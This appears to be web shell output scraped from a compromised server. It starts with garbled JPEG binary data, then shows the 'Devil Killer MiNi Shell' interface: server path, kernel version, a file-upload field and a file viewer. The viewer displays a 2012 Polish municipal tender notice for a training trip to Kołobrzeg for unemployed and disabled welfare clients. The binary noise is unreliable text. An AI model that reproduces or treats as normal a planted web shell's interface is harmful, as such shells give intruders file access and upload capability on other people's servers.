JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120209/40010-N-2012.html

<p class="kh_header"><b>Stargard Szczeciński: Zorganizowanie i przeprowadzenie kompleksowej usługi 3 - dniowego wyjazdu szkoleniowo-integracyjnego do Kołobrzegu dla 54 osób (z podziałem na dwie grupy po 25 osób + 2 opiekunów każda) uczestników partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII,  Działanie 7.1,  Poddziałanie 7.1.1.</b><br>
<b>Numer ogłoszenia: 40010 - 2012; data zamieszczenia: 09.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Warszawska 9a, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5784583 w. 136, faks 091 5770001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kompleksowej usługi 3 - dniowego wyjazdu szkoleniowo-integracyjnego do Kołobrzegu dla 54 osób (z podziałem na dwie grupy po 25 osób + 2 opiekunów każda) uczestników partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII,  Działanie 7.1,  Poddziałanie 7.1.1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kompleksowej usługi 3 - dniowego wyjazdu szkoleniowo-integracyjnego do Kołobrzegu dla 54 osób (z podziałem na dwie grupy po 25 osób + 2 opiekunów każda) uczestników partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII,  Działanie 7.1, Poddziałanie 7.1.1.

Uczestnicy wyjazdu, to osoby bezrobotne i niepełnosprawne w stopniu lekkim, bądź umiarkowanym, w wieku aktywności zawodowej - klienci Miejskiego Ośrodka Pomocy Społecznej w Stargardzie Szczecińskim.

WYKONAWCA ZAMÓWIENIA PUBLICZNEGO ZOBOWIĄZANY JEST DO:

1.	Przygotowania i zorganizowania kompleksowego  wyjazdu integracyjno-szkoleniowego łącznie dla 54 osób, nad morze do miejscowości Kołobrzeg z podziałem na dwie grupy po 25 osób plus 2 opiekunów z MOPS na grupę:
- I grupa 25 osób (10M i 15K) plus 2 opiekunów (2K) z MOPS w dniach  16-18 marzec 2012r.,
- II grupa 25 osób (16K i 9M) plus 2 opiekunów (2K) z MOPS  w dniach  10-12 sierpień 2012r.,
Wyjazd musi być przeprowadzony zgodnie z poniższym programem:

I dzień (piątek):

6.45                   	zbiórka przed Miejskim Ośrodkiem Pomocy Społecznej przy ul. Warszawskiej 9A, Stargard Szczeciński
7.00                   	wyjazd ze Stargardu Szczecińskiego,
9.00                   	przyjazd do Kołobrzegu-zakwaterowanie w hotelu,
9.30 -  10.00     	kawa powitalna,
10.00 - 13.00     	warsztaty z psychologiem w sali konferencyjnej
13.00 - 14.00     	przerwa obiadowa,
14.00 - 17.00     	wyjazd  na Latarnię Morską  oraz zwiedzanie Muzeum Minerałów w podziemiach latarni,  spacer po pasie nadmorskim z molem i Pomnikiem Zaślubin z Morzem,
17.00 - 17.30     	powrót do hotelu- przerwa kawowa,
17.30 - 18.30      	warsztaty z psychologiem,
18.30 - 19.00     	czas wolny,
19.00 - 20.00     	kolacja (wieczorek integracyjny-podkład muzyczny),
20.00 - 22.00     	karaoke (wieczorek integracyjny).
                 

II dzień (sobota):

7.00 -   8.00       	bufet śniadaniowy,
8.00 - 10.00       	warsztaty z psychologiem,
10.00 - 10.15      	przerwa kawowa,
10.15 - 13.15       	warsztaty z psychologiem,
13.15 - 14.15     	przerwa obiadowa,
14.15 - 17.00     	wyjście i zwiedzanie historycznej części miasta z Katedrą i średniowiecznymi kamieniczkami oraz wizyta  w Muzeum Oręża Polskiego,
17.00 - 17.30     	powrót do hotelu - przerwa kawowa,
17.30 - 18.30     	zajęcia z psychologiem,
18.30 - 19.30     	kolacja,
19.30 - 22.00     	czas wolny, korzystanie z atrakcji hotelu (basen, jacuzzi, sauna) .

III dzień (niedziela):	

7.00 -   8.00  	bufet śniadaniowy,
8.00 - 10.30      	warsztaty z doradcą zawodowym,
10.30 - 10.45     	przerwa kawowa,
10.45 - 13.15     	warsztaty z doradcą zawodowym
13.15 - 14.15     	obiad
14.15 - 15.00     	wykwaterowanie z hotelu,
15.00                  	przejazd do Centrum Atrakcji  Wojskowych BASTION, zwiedzanie kolekcji pojazdów
20.00-21.00        	planowany powrót do Stargardu Szczecińskiego

Wykonawca w cenie oferty musi uwzględnić opłaty wszelkich wejść do atrakcji wymienionych w programie oraz zapewnia opiekę przewodnika, jeżeli jest to konieczne.

2.	Zapewnienia przejazdu w obie strony, tj. ze Stargardu Szczecińskiego ul. Warszawska 9a do miejsca zakwaterowania i z powrotem oraz do miejsc wycieczek zorganizowanych w ramach wyjazdu własnym lub udostępnionym przez firmę przewozową autokarem, zgodnie z obowiązującymi przepisami dotyczącymi przewozu osób. Autokar ma posiadać klimatyzację, WC, TV i odtwarzacz DVD. Przewoźnik powinien posiadać wymagane przepisami dokumenty, m.in. licencję przewoźnika oraz zobowiązać się do:
a) podstawienia autokaru sprawnego technicznie, posiadającego pełną dokumentację gwarantującą jego przejazd na trasie określonej w umowie zgodnie z przepisami obowiązującymi w Polsce (m. in. aktualne badanie techniczne pojazdu, którym będą podróżować uczestnicy, aktualna licencja na wykonywanie krajowego transportu drogowego osób - dla przewoźnika, odpowiednie kwalifikacje zawodowe kierowcy), a także posiadać odpowiednie ubezpieczenie,
b) podstawienia autokaru w wyznaczonym miejscu i czasie, w stanie czystym, zarówno na zewnątrz jak i wewnątrz oraz do dbania o czystość autokaru podczas podróży.
3.	Zapewnienia opieki pilota nad uczestnikami wyjazdu.
4.	Zakwaterowania uczestników w jednym budynku z jadalnią w pokojach 2, 3 - osobowych. Każdy pokój z kompletem pościeli, pełnym węzłem sanitarnym (ciepła i zimna woda całą dobę), telewizorem, ręcznikami, papierem toaletowym.
Obiekt hotelowy musi dysponować basenem, jacuzzi i sauną do dyspozycji uczestników.
5.	Zapewnienia wyżywienia dla każdego uczestnika zgodnie z poniższym menu:

I dzień (piątek):

DWUDANIOWY OBIAD:
I danie:                	zupa ogórkowa z ziemniakami - (500ml/1os.)
II danie:               	ryba-dorsz.- 180g/1os., frytki - 200g/1os., kiszona kapusta z jabłkiem i marchewką -150 g/1os., sok lub  kompot - 200ml/1os.
deser:                  	kisiel z owocami - 200ml/1os
KOLACJA:
W formie szwedzkiego stołu ciepłe i zimne posiłki zgodnie z poniższym opisem:
1)	smażona lub grillowana karkówka - 200g/1os., kiełbasa z cebulką - 200g/1os.,
2)	trzy rodzaje wędlin:  szynka - 50g/1os.,  baleron - 50g/1os.,  polędwica - 50g/1os.,
3)	ser gouda - 50g/1os.,
4)	przystawki: pomidory - 20g  ogórki kiszone - 80g, ogórki świeże - 15g,
5)	napoje: kawa, herbata, soki, woda mineralna,
6)	pieczywo: chleb jasny, chleb ciemny,
7)	ciasto: sernik - 100g/1os., makowiec - 100g/1os.,
8)	owoce:  winogrona  -100g/1os., banany - 100g/1os., mandarynki - 100g/1os.

II dzień (sobota):

 ŚNIADANIE: 
W formie szwedzkiego stołu, w tym:
1)	dwa posiłki ciepłe: jajecznica na boczku - 300g/1os.,  parówki berlinki - 300g/1os.,
2)	trzy rodzaje wędlin:  szynka - 50g /1os., baleron  -50g/1os., polędwica - 50g/1os.,
3)	ser gouda - 50g/1os.,
4)	przystawki: pomidory - 20g, ogórki świeże - 15g,
5)	napoje: kawa, herbata, soki, woda mineralna,
6)	pieczywo: bułki,  chleb jasny, chleb ciemny,
7)	twaróg ze szczypiorkiem i rzodkiewką - 150g/1os.

DWUDANIOWY OBIAD:
I danie:                	zupa  pomidorowa z ryżem (500ml/1os.),
II danie:               	kotlet de volaille -200g/1os., ziemniaki  - 300g/1os., gotowana marchewka z - 150g,  sok lub kompot do  obiadu  -200ml/1os.,
deser:                  	szarlotka - 100g/1os.

KOLACJA:
W formie szwedzkiego stołu, w tym:
1)	jeden ciepły posiłek -  spaghetti sosem mięsnym  - 500g/1os.,
2)	trzy rodzaje wędlin: szynka  -50g/1os.,  baleron  - 50g/1os.,  polędwica  -50g/1os.,
3)	ser gouda - 50g/1os.,
4)	przystawki: pomidory - 20g, ogórki świeże - 15g,
5)	napoje: kawa, herbata, soki, woda mineralna,
6)	pieczywo: chleb jasny, chleb ciemny.
       
 III dzień (niedziela):

ŚNIADANIE: 
W formie szwedzkiego stołu, w tym:
1)	dwa posiłki ciepłe: jajecznica na boczku - 300g/1os.,  parówki berlinki - 300g/1os.,
2)	trzy rodzaje wędlin:  szynka - 50g/1os., baleron - 50g/ 1os.,  polędwica - 50g/1os.,
3)	ser gouda - 50g/1os.
4)	przystawki: pomidory - 20g, ogórki świeże - 15g,
5)	napoje: kawa, herbata, soki, woda mineralna,
6)	pieczywo: bułki, chleb jasny, chleb ciemny,
7)	twaróg ze szczypiorkiem i rzodkiewką - 150g/1os.

DWUDANIOWY OBIAD:
I danie:                	rosół z kury z makaronem (500ml/1os.),
II danie:               	kotlet mielony w sosie grzybowym - 150g/1os., kasza - 150g/1os., buraczki - 100g,  sok lub kompot   do  obiadu - 200ml/1os.,
deser:                  	sernik - 100g/1os.

Przy świadczeniu usług żywienia należy przestrzegać przepisów ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (tekst jedn. Dz. U. z 2010 r. Nr 136, poz. 914).

6.	Zapewnienia psychologa oraz opłacenia jego wynagrodzenia do przeprowadzenia łącznie 20 godzin zegarowych grupowych warsztatów dla łącznie 50 uczestników (z podziałem na dwie grupy po 25 osób i po 10 godzin z każdą grupą)  mających na celu rozwój kompetencji społecznych pozwalających na lepsze funkcjonowanie w społeczeństwie, poruszanie się po rynku pracy, wykształcenie zdolności pozytywnego myślenia i budowania poczucia własnej wartości. Psycholog musi zrealizować poniższy program:

1.	Efektywna komunikacja
a)	zasada skutecznej komunikacji,
b)	komunikacja niewerbalna,
c)	bariery w komunikacji,
d)	aktywne słuchanie - ćwiczenia w grupach.

Uczestnicy zapoznawani są z pojęciem komunikacji. Poznają praktyczne aspekty mowy niewerbalnej. Zaprezentowane są potencjalne przeszkody mogące spowodować brak skuteczności w komunikacji międzyludzkiej. Omówione są i ćwiczone techniki aktywnego słuchania wraz ze wskazaniem korzyści z ich stosowania. 
Metoda: prezentacja multimedialna, ćwiczenia warsztatowe w grupach.

2.	Konflikty interpersonalne
a)	przyczyny konfliktów,
b)	style rozwiązywania konfliktów - ćwiczenia w grupach,
c)	pozytywne strony konfliktów.

Uczestnicy zapoznawani są z definicją i przyczynami konfliktów w życiu człowieka. Konflikt prezentowany jest również jako aspekt przyczyniający się do rozwoju o ile zostaje prawidłowo rozwiązany poprzez odpowiednie style i techniki.
Metoda: prezentacja multimedialna, ćwiczenia w grupach, test na określenie własnego stylu rozwiązywania konfliktów.

3.	Wywieranie wpływu, manipulacja
a)	 rozpoznawanie manipulacji,
b)	metody obrony przed manipulacją - ćwiczenia warsztatowe w grupach.

Uczestnicy poznają szczegóły umożliwiające identyfikacje manipulacji oraz skuteczne metody radzenia sobie z nią.
Metoda: prezentacja multimedialna, ćwiczenia warsztatowe w grupach, test na diagnozę własnej podatności na manipulację.

4.	Temperament
a)	określenie swego temperamentu,
b)	funkcjonowanie ze swoim temperamentem w życiu i pracy.
  
                       Uczestnicy na podstawie odpowiedniego kwestionariusza określają swój temperament.  
                       Poznają wpływ temperamentu na codzienne życie, również zawodowe.
                       Metoda: kwestionariusz diagnozy temperamentu, analiza przypadku.

5.	Sztuka asertywności
a)	czym jest prawidłowa asertywność,
b)	zdolności asertywnych postaw- ćwiczenia w grupach.

Przekazane są wiadomości odnośnie  zagadnienia asertywności - czym jest oraz elementy ją tworzące. Uczestnicy zapoznawani są z prawidłowymi technikami bycia asertywnym   i zależnościami między asertywnością, a jakością życia.
Metoda: wykład, ćwiczenia warsztatowe w grupach.

6.	Motywacja
a)	źródła motywacji,
b)	zasady bycia zmotywowanym oraz motywacja innych - ćwiczenia w grupach.

Wykład ukazujący możliwość zdobycia i utrzymania źródeł własnej inspiracji. Przedstawione są metody utrwalania ich skuteczności, a także metody wzbudzania motywacji.
Metoda: wykład, ćwiczenia w grupach warsztatowych, debata.

7.	Zarządzanie stresem
a)	jak wyznaczyć sobie cele,
b)	zasady rozporządzania własnymi planami.

Czym jest stres w naszym życiu, dlaczego jest on niezbędny? Pozytywne metody odreagowywania i techniki radzenia sobie ze stresem.
Metoda: wykład, ćwiczenia w grupach warsztatowych, debata.

PODSUMOWANIE - rozmowy i dyskusje z uczestnikami.

7.	Zapewnienia doradcy zawodowego oraz opłacenia jego wynagrodzenia do przeprowadzenia łącznie 10 godzin zegarowych grupowych warsztatów dla 50 uczestników ( z podziałem na dwie grupy po 25 osób  i po 5 godzin z każdą grupą)  mających  na celu  zaplanowanie ścieżki kariery i opracowanie indywidualnego planu działania. 
Doradca zawodowy musi zrealizować poniższy program:
1.	Charakterystyka rynku pracy.
2.	Metody poszukiwania pracy.
3.	Selekcja ogłoszeń prasowych.
4.	Rozmowa kwalifikacyjna - jak się do niej przygotować?
5.	Dokumenty aplikacyjne - tworzenie.
8.	Zapewnienia klimatyzowanej sali wykładowej, która musi spełniać warunki BHP i być wyposażona w: rzutnik, TV plazmowy lub ekran, laptop, flipchart, sprzęt nagłaśniający, multimedialny, bufet zawierający: kawę (0,5l na osobę dziennie), herbatę (0,5l na osobę dziennie), wodę mineralną (0,5l na osobę dziennie) ciasto (200g/os).
9.	Zapewnienia uczestnikom obsługi kulturalno-rekreacyjnej przez którą rozumie się zorganizowanie wieczorku integracyjnego (piątek).
10.	Opłacenia taksy klimatycznej za wszystkich uczestników wyjazdu oraz opiekunów. 
11.	Zapewnienia materiałów szkoleniowych, tj.: teczka tekturowa, zeszyt A5, długopis, ołówek, testy i kwestionariusze podczas warsztatów (w tym jeden dodatkowy komplet do dokumentacji projektu).
12.	Ubezpieczenia uczestników programu od następstw nieszczęśliwych wypadków w trakcie przejazdów oraz w trakcie trwania wyjazdu na kwotę nie mniejszą niż 10 000,00 PLN na każdego uczestnika. Wykonawca zobowiąże się do przedłożenia Zamawiającemu polisy - umowy ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu. 
13.	Zapewnienia opieki pielęgniarskiej w razie potrzeby oraz zapewnienia w koniecznych przypadkach opieki lekarskiej, polegającej na wezwaniu lekarza do miejsca pobytu uczestnika/ów lub dowiezieniu nieodpłatnie uczestnika/ów pobytu do przychodni/szpitala.
14.	Oznakowania zaświadczeń, materiałów szkoleniowych oraz wszelkich innych pism, dokumentów, a także miejsca realizacji zajęć, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki   2007 - 2013 oraz informowania, że wyjazd jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
15.	Realizowania przez osoby posiadające odpowiednie kwalifikacje zajęć w ramach warsztatów (psycholog, doradca zawodowy).
16.	Prowadzenia dokumentacji szkolenia, tj:. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych.
17.	Wydania sporządzonej odpowiednio przez psychologa i doradcę zawodowego pisemnej opinii o każdym z uczestników biorącym udział w warsztatach  i wydania zaświadczeń o uczestnictwie w warsztatach.
18.	Przeprowadzenia anonimowej ankiety badającej zaangażowanie oraz poziom motywacji                do podjęcia zatrudnienia przez uczestników przed rozpoczęciem zajęć oraz po zakończonych zajęciach.
19.	Przekazania Zamawiającemu potwierdzonych za zgodność z oryginałem kserokopii dokumentów związanych z wyjazdem szkoleniowo-integracyjnym ( wymienionych w pkt 10, 11, 16, 17 , 18) w terminie 7 dni od dnia zakończenia wyjazdu szkoleniowo-integracyjnego dla każdej z grup czyli odpowiednio najpóźniej do dnia 25 marca 2012r. dla grupy I oraz 20 sierpnia 2012 dla grupy II.
20.	Niezwłocznego poinformowania Zamawiającego o sytuacjach, które mogą mieć wpływ na realizację programu.
21.	Przechowywania dokumentów potwierdzających realizację przedmiotowego wyjazdu do dnia 31.12.2020 r.
22.	Zamawiający zastrzega sobie prawo do przedłużenia terminu, o którym mowa w ust. 21. Zamawiający powiadomi pisemnie o tym fakcie Wykonawcę przed upływem tego terminu.
23.	Powiadomienie, o którym mowa w ust. 22 oznacza konieczność przedłużenia okresu przechowywania dokumentacji.
24.	Wykonawcy nie przysługuje dodatkowe wynagrodzenie z tytułu przechowywania dokumentacji związanej z realizacją umowy.
25.	Wykonawca zamówienia nie może pobierać żadnych opłat od uczestników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 63.51.10.00-4, 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone  przez  wykonawcę o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych, o którym mowa wyżej oraz posiada zezwolenie na wykonywanie usług tożsamych z przedmiotem zamówienia.

Ocena zostanie dokonana przez Zamawiającego na podstawie złożonych przez wykonawców dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług (co najmniej 3) w okresie ostatnich 3 lat przed upływem terminu do składania ofert, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usług o profilu tożsamym lub zbliżonym (organizacja wyjazdów szkoleniowo-integracyjnych dla jednorazowej liczby uczestników nie mniejszej niż 27 osób) do przedmiotu zamówienia, z podaniem wartości, przedmiotu, dat wykonania i odbiorców - załącznik nr 7 do SIWZ.

Ocena zostanie dokonana przez Zamawiającego na podstawie złożonych przez wykonawców dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia  warunek  dotyczący dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia, jeżeli wykonawca wykaże, iż dysponuje: 

- obiektem spełniającym warunki opisu przedmiotu zamówienia

W tym celu wykonawca składa :
jeżeli wykonawca jest podmiotem prowadzącym/posiadaczem  hotel/ośrodek/pensjonat - oświadczenie o możliwości zakwaterowania w terminach podanych w SIWZ grupy uczestników w warunkach określonych w Rozdziale 3 pkt 4 oraz sali wykładowej spełniającej wymagania Zamawiającego określone w Rozdziale 3 pkt 8.

w przeciwnym razie:

pisemne zobowiązanie tego podmiotu do oddania mu do dyspozycji niezbędnych zasobów tj. oświadczenie podmiotu prowadzącego hotel/ośrodek/pensjonat o możliwości zakwaterowania w terminach podanych w SIWZ grupy uczestników w warunkach określonych w Rozdziale 3 pkt 4 oraz sali wykładowej spełniającej wymagania Zamawiającego określone w Rozdziale 3 pkt 8. W formularzu ofertowym wykonawca wskazuje ww. podmiot jako podwykonawcę danego zakresu zamówienia. 

autokarem 
W tym celu wykonawca składa:
jeżeli wykonawca jest posiadaczem autokaru  oświadczenie o dysponowaniu autokarem zgodnym z opisem w SIWZ, 

w przeciwnym razie:

składa pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji niezbędnych zasobów tj. oświadczenie posiadacza autokaru/firmy przewozowej o oddaniu do dyspozycji autokaru wraz z kierowcą spełniającego wymagania Zamawiającego opisane w SIWZ. W formularzu ofertowym wskazuje ww. podmiot jako podwykonawcę danego zakresu zamówienia.

Ocena zostanie dokonana przez Zamawiającego na podstawie złożonych przez wykonawców dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia  warunek  dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykonawca wykaże, iż dysponuje: 

- osobami  posiadającymi wykształcenie psychologiczne oraz uprawnienia do przeprowadzenia 20 godzin zegarowych grupowych warsztatów dla łącznie 50 uczestników (z podziałem na dwie grupy po 25 osób i po 10 godzin z każdą grupą )  mających na celu rozwój kompetencji społecznych pozwalających na lepsze funkcjonowanie w społeczeństwie, wykształcenie zdolności pozytywnego myślenia i budowania poczucia własnej wartości,
- osobami  posiadającymi uprawnienia doradcy zawodowego do przeprowadzenia  5 godzin zegarowych grupowych warsztatów dla 50 uczestników ( z podziałem na dwie grupy po 25 osób i po 5 godzin z każdą grupą)  mających  na celu  zaplanowanie ścieżki kariery i opracowanie indywidualnego planu działania,
- osobami posiadającymi licencję pilota wycieczek, które mają doświadczenie w organizacji  i realizacji tożsamych z niniejszym zamówieniem usług.

Wykonawca w tym celu składa:
-wykaz  osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami - załącznik nr 5 do SIWZ,
-oświadczenie, że osoby, które będą uczestniczyć  w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - załącznik nr 6 do SIWZ.

Ocena zostanie dokonana przez Zamawiającego na podstawie złożonych przez wykonawców dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
